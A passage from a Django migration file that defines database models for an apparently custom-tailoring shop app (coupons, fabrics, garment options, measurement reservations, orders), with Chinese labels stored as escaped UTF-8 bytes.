('neibuzaoxing_sy', models.CharField(default=b'', choices=[(b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe', b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe'), (b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe', b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe9\x80\xa0\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibudou_sy', models.CharField(default=b'', choices=[(b'\xe9\x87\x8c\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c'), (b'\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe5\x85\x9c( \xe5\xa4\x9a\xe9\x80\x89\xe7\x94\xa8 \xe2\x80\x98|\xe2\x80\x99 \xe7\xba\xbf\xe5\x88\x86\xe5\x89\xb2)\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('kuzhe_xk', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe8\xa4\xb6', b'\xe6\x97\xa0\xe8\xa4\xb6'), (b'\xe5\x8d\x95\xe8\xa4\xb6', b'\xe5\x8d\x95\xe8\xa4\xb6'), (b'\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe5\x8f\x8c\xe8\xa4\xb6')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\xa4\xb6\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('houdou_xk', models.CharField(default=b'', choices=[(b'\xe5\x8f\xb3\xe8\xbe\xb9', b'\xe5\x8f\xb3\xe8\xbe\xb9'), (b'\xe4\xb8\xa4\xe8\xbe\xb9', b'\xe4\xb8\xa4\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe5\x85\x9c\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('kujiao_xk', models.CharField(default=b'', choices=[(b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9', b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9'), (b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9', b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\x84\x9a\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('lingxing_cs', models.CharField(default=b'', choices=[(b'\xe6\xa0\x87\xe5\x87\x86', b'\xe6\xa0\x87\xe5\x87\x86'), (b'\xe5\x85\xab\xe5\xad\x97', b'\xe5\x85\xab\xe5\xad\x97'), (b'\xe4\xb8\x80\xe5\xad\x97', b'\xe4\xb8\x80\xe5\xad\x97'), (b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86', b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86'), (b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86', b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('xiukou_cs', models.CharField(default=b'', choices=[(b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92', b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92', b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92', b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe5\x8f\xa3\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('xiabai_cs', models.CharField(default=b'', choices=[(b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86', b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe4\xb8\x8b\xe6\x91\x86\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('menjin_cs', models.CharField(default=b'', choices=[(b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f', b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\x97\xa8\xe8\xa5\x9f\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('houbei_cs', models.CharField(default=b'', choices=[(b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6', b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6'), (b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0', b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe8\x83\x8c\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('koudai_cs', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x8f\xa3\xe8\xa2\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('add_kuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe8\xa3\xa4\xe5\xad\x90')),
('add_majia', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe9\xa9\xac\xe7\x94\xb2')),
('majia_lingxing', models.CharField(default=b'', choices=[(b'V\xe9\xa2\x86', b'V\xe9\xa2\x86'), (b'U\xe9\xa2\x86', b'U\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe9\xa2\x86\xe5\x9e\x8b')),
('majia_kouxing', models.CharField(default=b'', choices=[(b'4', b'4'), (b'5', b'5'), (b'6', b'6'), (b'4*2', b'4*2'), (b'6*3', b'6*3'), (b'8*4', b'8*4')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe6\x89\xa3\xe5\x9e\x8b')),
('add_bespoke', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6Bespoke')),
('add_xiuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe7\xbb\xa3\xe5\xad\x97')),
('xiuzi', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\xbb\xa3\xe5\xad\x97', blank=True)),
('address', models.ForeignKey(verbose_name=b'\xe5\x9c\xb0\xe5\x9d\x80', blank=True, to='wap.Address4Order', null=True)),
],
options={
'verbose_name': '\u8d2d\u7269\u8f66',
'verbose_name_plural': '\u8d2d\u7269\u8f66',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ClothParam',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32, null=True, verbose_name=b'\xe5\x8f\x82\xe6\x95\xb0\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('price', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('image', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe5\x9b\xbe\xe7\x89\x87', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Coupon',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('money', models.IntegerField(default=0, max_length=8, null=True, verbose_name=b'\xe9\x87\x91\xe9\xa2\x9d', blank=True)),
('isUsed', models.CharField(default=b'0', max_length=2, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xbd\xbf\xe7\x94\xa8', choices=[(b'1', b'\xe5\xb7\xb2\xe4\xbd\xbf\xe7\x94\xa8'), (b'0', b'\xe6\x9c\xaa\xe4\xbd\xbf\xe7\x94\xa8')])),
('type', models.CharField(default=b'shirt', max_length=10, verbose_name=b'\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8\xe7\xb1\xbb\xe5\x9e\x8b', choices=[(b'shirt', b'\xe8\xa1\xac\xe8\xa1\xab\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8'), (b'suit', b'\xe8\xa5\xbf\xe6\x9c\x8d\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8'), (b'redpacket', b'\xe5\xbe\xae\xe4\xbf\xa1\xe7\xba\xa2\xe5\x8c\x85\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8')])),
('expire_time', models.DateTimeField(null=True, verbose_name=b'\xe5\xa4\xb1\xe6\x95\x88\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('use_time', models.DateTimeField(null=True, verbose_name=b'\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
],
options={
'verbose_name': '\u4f18\u60e0\u5238',
'verbose_name_plural': '\u4f18\u60e0\u5238',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Fabric',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('volume', models.FloatField(max_length=64, null=True, verbose_name=b'\xe6\x95\xb0\xe9\x87\x8f', blank=True)),
('thumbnail_url', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xe7\xbc\xa9\xe7\x95\xa5\xe5\x9b\xbe', blank=True)),
('image_url', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xe5\xa4\xa7\xe5\x9b\xbe', blank=True)),
('content', models.TextField(null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xe6\x8f\x8f\xe8\xbf\xb0', blank=True)),
('price', models.IntegerField(max_length=11, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u9762\u6599\u4fe1\u606f',
'verbose_name_plural': '\u9762\u6599\u4fe1\u606f',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HouBeiChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u540e\u80cc\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u540e\u80cc\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='HouDouXiKu',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u540e\u515c\uff08\u897f\u88e4\uff09',
'verbose_name_plural': '\u540e\u515c\uff08\u897f\u88e4\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KaiQiShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u5f00\u6c14\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u5f00\u6c14\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KouDaiChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u53e3\u888b\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u53e3\u888b\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KouXingShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u6263\u578b\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u6263\u578b\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KuJiaoXiKu',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u88e4\u811a\uff08\u897f\u88e4\uff09',
'verbose_name_plural': '\u88e4\u811a\uff08\u897f\u88e4\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KuZheXiKu',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u88e4\u8936\uff08\u897f\u88e4\uff09',
'verbose_name_plural': '\u88e4\u8936\uff08\u897f\u88e4\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='LingXingChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9886\u578b\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u9886\u578b\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='LingXingShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9886\u578b\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u9886\u578b\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='MaJiaKouXing',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9a6c\u7532\u6263\u578b',
'verbose_name_plural': '\u9a6c\u7532\u6263\u578b',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='MaJiaLingXing',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9a6c\u7532\u9886\u578b',
'verbose_name_plural': '\u9a6c\u7532\u9886\u578b',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='MeasureReservation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reservation_number', models.CharField(max_length=128, null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe9\xa2\x84\xe7\xba\xa6\xe5\x8f\xb7', blank=True)),
('phone', models.CharField(max_length=128, null=True, verbose_name=b'\xe9\xa2\x84\xe7\xba\xa6\xe6\x89\x8b\xe6\x9c\xba', blank=True)),
('name', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xa7\x93\xe5\x90\x8d', blank=True)),
('sex', models.CharField(default=b'\xe5\xa5\xb3', choices=[(b'\xe5\xa5\xb3', b'\xe5\xa5\xb3'), (b'\xe7\x94\xb7', b'\xe7\x94\xb7')], max_length=10, blank=True, null=True, verbose_name=b'\xe6\x80\xa7\xe5\x88\xab')),
('weight', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbd\x93\xe9\x87\x8d', blank=True)),
('height', models.FloatField(default=0, null=True, verbose_name=b'\xe8\xba\xab\xe9\xab\x98', blank=True)),
('reservation_time', models.DateTimeField(null=True, verbose_name=b'\xe9\xa2\x84\xe7\xba\xa6\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('address_region', models.CharField(default=b'', max_length=64, null=True, verbose_name=b'\xe6\x89\x80\xe5\x9c\xa8\xe5\xb8\x82\xe5\x8c\xba', blank=True)),
('address_street', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe8\xa1\x97\xe9\x81\x93\xe8\xaf\xa6\xe7\xbb\x86\xe5\x9c\xb0\xe5\x9d\x80', blank=True)),
],
options={
'verbose_name': '\u9884\u7ea6\u91cf\u4f53',
'verbose_name_plural': '\u9884\u7ea6\u91cf\u4f53',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MenJinChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u95e8\u895f\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u95e8\u895f\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='NeiBuDouShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u5185\u90e8\u515c\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u5185\u90e8\u515c\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='NeiBuZaoXingShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u5185\u90e8\u9020\u578b\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u5185\u90e8\u9020\u578b\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order_number', models.CharField(max_length=128, null=True, verbose_name=b'\xe8\xae\xa2\xe5\x8d\x95\xe5\x8f\xb7', blank=True)),
('order_status', models.CharField(blank=True, max_length=10, null=True, verbose_name=b'\xe8\xae\xa2\xe5\x8d\x95\xe7\x8a\xb6\xe6\x80\x81', choices=[(b'\xe6\x9c\xaa\xe4\xbb\x98\xe6\xac\xbe', b'\xe6\x9c\xaa\xe4\xbb\x98\xe6\xac\xbe'), (b'\xe5\xb7\xb2\xe4\xbb\x98\xe6\xac\xbe', b'\xe5\xb7\xb2\xe4\xbb\x98\xe6\xac\xbe'), (b'\xe5\xae\x9a\xe5\x88\xb6\xe4\xb8\xad', b'\xe5\xae\x9a\xe5\x88\xb6\xe4\xb8\xad'), (b'\xe5\xae\x9a\xe5\x88\xb6\xe5\xae\x8c\xe6\x88\x90', b'\xe5\xae\x9a\xe5\x88\xb6\xe5\xae\x8c\xe6\x88\x90'), (b'\xe9\x85\x8d\xe9\x80\x81\xe4\xb8\xad', b'\xe9\x85\x8d\xe9\x80\x81\xe4\xb8\xad'), (b'\xe5\xb7\xb2\xe4\xba\xa4\xe4\xbb\x98', b'\xe5\xb7\xb2\xe4\xba\xa4\xe4\xbb\x98')])),
('price', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('is4friend', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xb8\xba\xe9\x87\x8d\xe8\xa7\x86\xe7\x9a\x84\xe4\xba\xba\xe5\xae\x9a\xe5\x88\xb6')),
('friend_phone', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe6\x9c\x8b\xe5\x8f\x8b\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('create_time', models.DateTimeField(auto_now=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('kouxing_sy', models.CharField(default=b'', choices=[(b'1', b'1'), (b'2', b'2'), (b'3', b'3'), (b'2*1', b'2*1'), (b'4*2', b'4*2'), (b'6*2', b'6*2')], max_length=16, blank=True, null=True, verbose_name=b'\xe6\x89\xa3\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('lingxing_sy', models.CharField(default=b'', choices=[(b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('yaodou_sy', models.CharField(default=b'', choices=[(b'\xe6\x99\xae\xe9\x80\x9a', b'\xe6\x99\xae\xe9\x80\x9a'), (b'\xe6\x96\x9c\xe5\x85\x9c', b'\xe6\x96\x9c\xe5\x85\x9c'), (b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c', b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x85\x9c\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('kaiqi_sy', models.CharField(default=b'', choices=[(b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94', b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94', b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe6\x97\xa0', b'\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\xbc\x80\xe6\xb0\x94\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('xiukou_sy', models.CharField(default=b'', choices=[(b'3', b'3'), (b'4', b'4')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe6\x89\xa3\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibuzaoxing_sy', models.CharField(default=b'', choices=[(b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe', b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe'), (b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe', b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe9\x80\xa0\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibudou_sy', models.CharField(default=b'', choices=[(b'\xe9\x87\x8c\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c'), (b'\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe5\x85\x9c( \xe5\xa4\x9a\xe9\x80\x89\xe7\x94\xa8 \xe2\x80\x98|\xe2\x80\x99 \xe7\xba\xbf\xe5\x88\x86\xe5\x89\xb2)\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('beizhu_sy', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe4\xb8\x8a\xe8\xa1\xa3\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
